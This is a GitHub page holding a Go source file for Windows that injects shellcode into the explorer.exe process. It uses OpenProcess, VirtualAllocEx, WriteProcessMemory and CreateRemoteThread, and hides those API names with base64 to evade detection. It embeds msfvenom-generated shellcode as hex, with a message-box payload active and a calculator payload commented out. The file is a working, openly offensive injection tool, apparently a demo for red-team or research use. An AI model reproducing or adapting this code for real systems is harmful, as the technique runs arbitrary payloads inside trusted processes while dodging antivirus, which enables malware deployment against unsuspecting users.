-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathinject.go
115 lines (91 loc) · 4.25 KB
/
inject.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
// +build windows
package main
import (
"encoding/base64"
"encoding/hex"
"fmt"
"log"
"unsafe"
"golang.org/x/sys/windows"
)
// unsafe.Sizeof(windows.ProcessEntry32{})
const processEntrySize = 568
func processID(name string) (uint32, error) {
h, err := windows.CreateToolhelp32Snapshot(windows.TH32CS_SNAPPROCESS, 0)
if err != nil {
return 0, err
}
p := windows.ProcessEntry32{Size: processEntrySize}
for {
err := windows.Process32Next(h, &p)
if err != nil {
return 0, err
}
if windows.UTF16ToString(p.ExeFile[:]) == name {
return p.ProcessID, nil
}
}
return 0, fmt.Errorf("%q not found", name)
}
func openProcess(pid uint32) (handle *windows.Handle, err error) {
const openProcessparams = windows.PROCESS_CREATE_THREAD | windows.PROCESS_VM_OPERATION | windows.PROCESS_VM_WRITE | windows.PROCESS_VM_READ | windows.PROCESS_QUERY_INFORMATION
// Get a handle on remote process
pHandle, err := windows.OpenProcess(openProcessparams, false, pid)
if err != nil {
return nil, err
}
return &pHandle, nil
}
func decodeString(s string) string {
sDecoded, _ := base64.StdEncoding.DecodeString(s)
return string(sDecoded)
}
func inject(handle *windows.Handle, payload []byte) (err error) {
kdll := "a2VybmVsMzIuZGxs"
wpm := "V3JpdGVQcm9jZXNzTWVtb3J5"
valex := "VmlydHVhbEFsbG9jRXg="
crtid := "Q3JlYXRlUmVtb3RlVGhyZWFk"
const allocParams = windows.MEM_COMMIT | windows.MEM_RESERVE
kernel32DLL := windows.NewLazySystemDLL(decodeString(kdll))
WriteProcessMemory := kernel32DLL.NewProc(decodeString(wpm))
VirtualAllocEx := kernel32DLL.NewProc(decodeString((valex)))
CreateRemoteThread := kernel32DLL.NewProc(decodeString(crtid))
remoteCode, _, err := VirtualAllocEx.Call(uintptr(*handle), 0, uintptr(len(payload)), windows.MEM_COMMIT, windows.PAGE_EXECUTE_READ)
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Println("ops %v", err.Error())
return err
}
// Write the payload into the code cave
_, _, err = WriteProcessMemory.Call(uintptr(*handle), remoteCode, (uintptr)(unsafe.Pointer(&payload[0])), uintptr(len(payload)))
if err != nil && err.Error() != "The operation completed successfully." {
log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", err.Error()))
}
hThread, _, err := CreateRemoteThread.Call(uintptr(*handle), 0, 0, remoteCode, 0, 0, 0)
if err != nil && err.Error() != "The operation completed successfully." {
windows.WaitForSingleObject(windows.Handle(hThread), 500)
windows.CloseHandle(windows.Handle(hThread))
}
return nil
}
func main() {
procName := "ZXhwbG9yZXIuZXhl"
pid, err := processID(decodeString(procName))
if err != nil {
log.Fatalln(err)
}
// calc 64, generated with msfvenom
//payload, err := hex.DecodeString("fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500")
// messagebox 64, generated with msfvenom
payload, err := hex.DecodeString("fc4881e4f0ffffffe8d0000000415141505251564831d265488b52603e488b52183e488b52203e488b72503e480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed5241513e488b52203e8b423c4801d03e8b80880000004885c0746f4801d0503e8b48183e448b40204901d0e35c48ffc93e418b34884801d64d31c94831c0ac41c1c90d4101c138e075f13e4c034c24084539d175d6583e448b40244901d0663e418b0c483e448b401c4901d03e418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a3e488b12e949ffffff5d49c7c1000000003e488d95fe0000003e4c8d85060100004831c941ba45835607ffd54831c941baf0b5a256ffd557303020573030004d657373616765426f7800")
if err != nil {
log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", err.Error()))
}
pHandle, errProc := openProcess(uint32(pid))
if errProc != nil {
log.Fatal(fmt.Sprintf("[!]Error calling OpenProcess:\r\n%s", errProc.Error()))
} else {
inject(pHandle, payload)
windows.CloseHandle(*pHandle)
}
windows.Exit(0)
}